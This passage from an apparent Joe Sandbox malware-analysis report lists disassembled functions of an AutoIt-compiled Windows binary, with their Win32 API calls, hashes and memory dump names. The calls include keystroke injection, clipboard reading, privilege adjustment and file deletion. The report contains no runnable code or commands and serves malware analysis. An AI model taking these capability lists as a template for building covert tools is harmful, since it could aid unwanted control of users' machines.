                                                                                                                                        • GetParent.USER32(?), ref: 007CFBAA
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007CFC10
                                                                                                                                        • SendMessageW.USER32 ref: 007CFC40
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CFC96
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007CFCC2
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007CFCEA
                                                                                                                                        • SendMessageW.USER32 ref: 007CFD0D
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CFD57
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007CFD87
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CFE1C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                        • API String ID: 3461372671-4164748364
                                                                                                                                        • Opcode ID: dd5d9c1b9eb1e9c9b77eb9fee0b30faa46d79e3a4e286ec00e285160babf867a
                                                                                                                                        • Instruction ID: fc755cb6da6ce739dcce1576003c20eb606463c1eafc5c057a7c5b90da0d2ddd
                                                                                                                                        • Opcode Fuzzy Hash: dd5d9c1b9eb1e9c9b77eb9fee0b30faa46d79e3a4e286ec00e285160babf867a
                                                                                                                                        • Instruction Fuzzy Hash: 2C32A970204245AFDB20EF68C888FAABBE6FF48354F14462DF6A5972A1C739DC45CB51
                                                                                                                                        Function 007CA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007CAFDB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                                        • Opcode ID: 93a1b42001c54968eb0a60a81523ff30820716d74020957b638500cb48c7b326
                                                                                                                                        • Instruction ID: a71421961f01f8576240d6973266aa557c562dc8282a8a112f0a9bdb2965f4e4
                                                                                                                                        • Opcode Fuzzy Hash: 93a1b42001c54968eb0a60a81523ff30820716d74020957b638500cb48c7b326
                                                                                                                                        • Instruction Fuzzy Hash: 5612BFB1600248BBEB259F64CC49FAE7BB8EF49315F10821DF516DB291DB788941CB51
                                                                                                                                        Function 0077F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0077F796
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D4388
                                                                                                                                        • IsIconic.USER32(000000FF), ref: 007D4391
                                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 007D439E
                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 007D43A8
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D43BE
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 007D43C5
                                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007D43D1
                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007D43E2
                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007D43EA
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007D43F2
                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 007D43F5
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D440A
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4415
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D441F
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4424
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D442D
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4432
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D443C
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4441
                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 007D4444
                                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 007D446B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                                        • Opcode ID: 29d2a4bd56122310331448e757658c6b83a6c9a01e1e8ac5e6d69e0c307b485e
                                                                                                                                        • Instruction ID: 440bd8805a04f05c10f413b7d3a94b96d9ef02b721192fa555fe689aa101a1bb
                                                                                                                                        • Opcode Fuzzy Hash: 29d2a4bd56122310331448e757658c6b83a6c9a01e1e8ac5e6d69e0c307b485e
                                                                                                                                        • Instruction Fuzzy Hash: 91318571A402587BEB305B759C89F7F3E7CEB48B90F108016FA05EA2D0C6B95D50AEA4
                                                                                                                                        Function 0076BDF0 Relevance: 37.4, APIs: 12, Strings: 9, Instructions: 643COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,008222E8,?,00000000,?,00763E2E,?,00000000,?,007FDBF0,00000000,?), ref: 0076BE8B
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00763E2E,?,00000000,?,007FDBF0,00000000,?,00000002), ref: 0076BEA7
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0076BF19
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcscpy.LIBCMT ref: 0076BF31
                                                                                                                                        • _wcscat.LIBCMT ref: 0076BF46
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076BF56
                                                                                                                                        • _wcscpy.LIBCMT ref: 0076C03E
                                                                                                                                        • _wcscpy.LIBCMT ref: 0076C1ED
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32 ref: 0076C250
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                          • Part of subcall function 0076C320: _memmove.LIBCMT ref: 0076C419
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$G-v$Unterminated string$_
                                                                                                                                        • API String ID: 2542276039-2536452045
                                                                                                                                        • Opcode ID: bc19d43d9ee62ee29239b24d7d86d4a8da364290561d7eb47c5cf246777b38c4
                                                                                                                                        • Instruction ID: bf961627e9a1bd9e518c1c8c15cd3cf09436270b36b0f219b13b59fa171a587f
                                                                                                                                        • Opcode Fuzzy Hash: bc19d43d9ee62ee29239b24d7d86d4a8da364290561d7eb47c5cf246777b38c4
                                                                                                                                        • Instruction Fuzzy Hash: A0428D71508345DFD711EF60C855BABB7E8BF85300F04492AF98687252EB39EA49CB93
                                                                                                                                        Function 007A6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                          • Part of subcall function 007A7B9F: __wsplitpath.LIBCMT ref: 007A7BBC
                                                                                                                                          • Part of subcall function 007A7B9F: __wsplitpath.LIBCMT ref: 007A7BCF
                                                                                                                                          • Part of subcall function 007A7C0C: GetFileAttributesW.KERNEL32(?,007A6A7B), ref: 007A7C0D
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6B9D
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6BBB
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007A6BE2
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007A6BF8
                                                                                                                                        • _wcscpy.LIBCMT ref: 007A6C57
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6C6A
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6C7D
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 007A6CAB
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007A6CBC
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007A6CDB
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007A6CEA
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 007A6CFF
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007A6D10
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007A6D37
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007A6D53
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007A6D61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                                        • Opcode ID: 51460e8806171b6c73ddcb59becf6edb8fffabb9c05d7bd13a8d4697467e0896
                                                                                                                                        • Instruction ID: 1fc474184c7e6569c19f8b57e2b661ec5d48bd0457eddc5a8a004a7e2f7fe27f
                                                                                                                                        • Opcode Fuzzy Hash: 51460e8806171b6c73ddcb59becf6edb8fffabb9c05d7bd13a8d4697467e0896
                                                                                                                                        • Instruction Fuzzy Hash: AB51317290415CAACF21EBA0DC88EDE777CBF4A344F4846D6E549A7041DB389B89CF61
                                                                                                                                        Function 007B7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32(007FDBF0), ref: 007B70C3
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 007B70D1
                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 007B70D9
                                                                                                                                        • CloseClipboard.USER32 ref: 007B70E5
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007B7101
                                                                                                                                        • CloseClipboard.USER32 ref: 007B710B
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007B7120
                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 007B712D
                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 007B7135
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007B7142
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007B7176
                                                                                                                                        • CloseClipboard.USER32 ref: 007B7283
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3222323430-0
                                                                                                                                        • Opcode ID: 21779d1b7517ad48686bdff69e692811a59c7c717fb49de597d56b1d49287ab5
                                                                                                                                        • Instruction ID: 7c5f24a69f8248db119b0489e4e935ad189a9f1ee9edc61f056d258ad23b4cfd
                                                                                                                                        • Opcode Fuzzy Hash: 21779d1b7517ad48686bdff69e692811a59c7c717fb49de597d56b1d49287ab5
                                                                                                                                        • Instruction Fuzzy Hash: 3051D371208245ABD325EB64DC8AFAE77A8BFC8B01F008519F646DA1D1DB78DC04CB62
                                                                                                                                        Function 0079B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079BF0F
                                                                                                                                          • Part of subcall function 0079BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079BF3C
                                                                                                                                          • Part of subcall function 0079BEC3: GetLastError.KERNEL32 ref: 0079BF49
                                                                                                                                        • _memset.LIBCMT ref: 0079BA34
                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0079BA86
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079BA97
                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0079BAAE
                                                                                                                                        • GetProcessWindowStation.USER32 ref: 0079BAC7
                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 0079BAD1
                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0079BAEB
                                                                                                                                          • Part of subcall function 0079B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0079B8C5
                                                                                                                                          • Part of subcall function 0079B8B0: CloseHandle.KERNEL32(?), ref: 0079B8D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                                        • Opcode ID: a24899a4fe24fe958b903fdf03af11469ae3287e5f9e9390f267bbb78773f1f9
                                                                                                                                        • Instruction ID: ffedb94f9926b13cdf093ec2430c58a9339ef521082b5aab396497f8fd735718
                                                                                                                                        • Opcode Fuzzy Hash: a24899a4fe24fe958b903fdf03af11469ae3287e5f9e9390f267bbb78773f1f9
                                                                                                                                        • Instruction Fuzzy Hash: 73818D71801248EFDF11DFA4EE89AEEBBB9FF09304F048159F914A6160DB398E14DB60
                                                                                                                                        Function 007B2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007B2065
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B207A
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2091
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 007B20A3
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007B20BD
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007B20D5
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B20E0
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007B20FC
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2123
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B213A
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B214C
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00813A68), ref: 007B216A
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B2174
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B2181
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B2191
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                                        • Opcode ID: c2393b0b0b3a1691e2b3df22e16b442c6eb25f721a02eb6167e2323b0c39006a
                                                                                                                                        • Instruction ID: dac1ce0babcb2dfcbc19a3992599a0d0415d2caac0922bdde4ffdf5f2d3856cc
                                                                                                                                        • Opcode Fuzzy Hash: c2393b0b0b3a1691e2b3df22e16b442c6eb25f721a02eb6167e2323b0c39006a
                                                                                                                                        • Instruction Fuzzy Hash: FD31A37150221DAECB20EBA4EC8CBDE77ACAF09350F104156E910E6191DB7CDE56CB64
                                                                                                                                        Function 007CF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 007CF14B
                                                                                                                                          • Part of subcall function 007CD5EE: ClientToScreen.USER32(?,?), ref: 007CD617
                                                                                                                                          • Part of subcall function 007CD5EE: GetWindowRect.USER32(?,?), ref: 007CD68D
                                                                                                                                          • Part of subcall function 007CD5EE: PtInRect.USER32(?,?,007CEB2C), ref: 007CD69D
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007CF1B4
                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007CF1BF
                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007CF1E2
                                                                                                                                        • _wcscat.LIBCMT ref: 007CF212
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007CF229
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007CF242
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007CF259
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007CF27B
                                                                                                                                        • DragFinish.SHELL32(?), ref: 007CF282
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007CF36D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                        • API String ID: 2166380349-3440237614
                                                                                                                                        • Opcode ID: 7570460c1c293b6b31654d7c1e0db62c3b6767a3c0fac2980ee4e9b5e44b5f25
                                                                                                                                        • Instruction ID: 624e7bc0c705e7bf14dde371feedf2877887bc541397808e82be53217c3fad40
                                                                                                                                        • Opcode Fuzzy Hash: 7570460c1c293b6b31654d7c1e0db62c3b6767a3c0fac2980ee4e9b5e44b5f25
                                                                                                                                        • Instruction Fuzzy Hash: B8614771108344AFC711EF60DC89E9BBBF8FF89750F004A2DF595961A1DB389A45CB62
                                                                                                                                        Function 007B219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007B21C0
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B21D5
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B21EC
                                                                                                                                          • Part of subcall function 007A7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007A7621
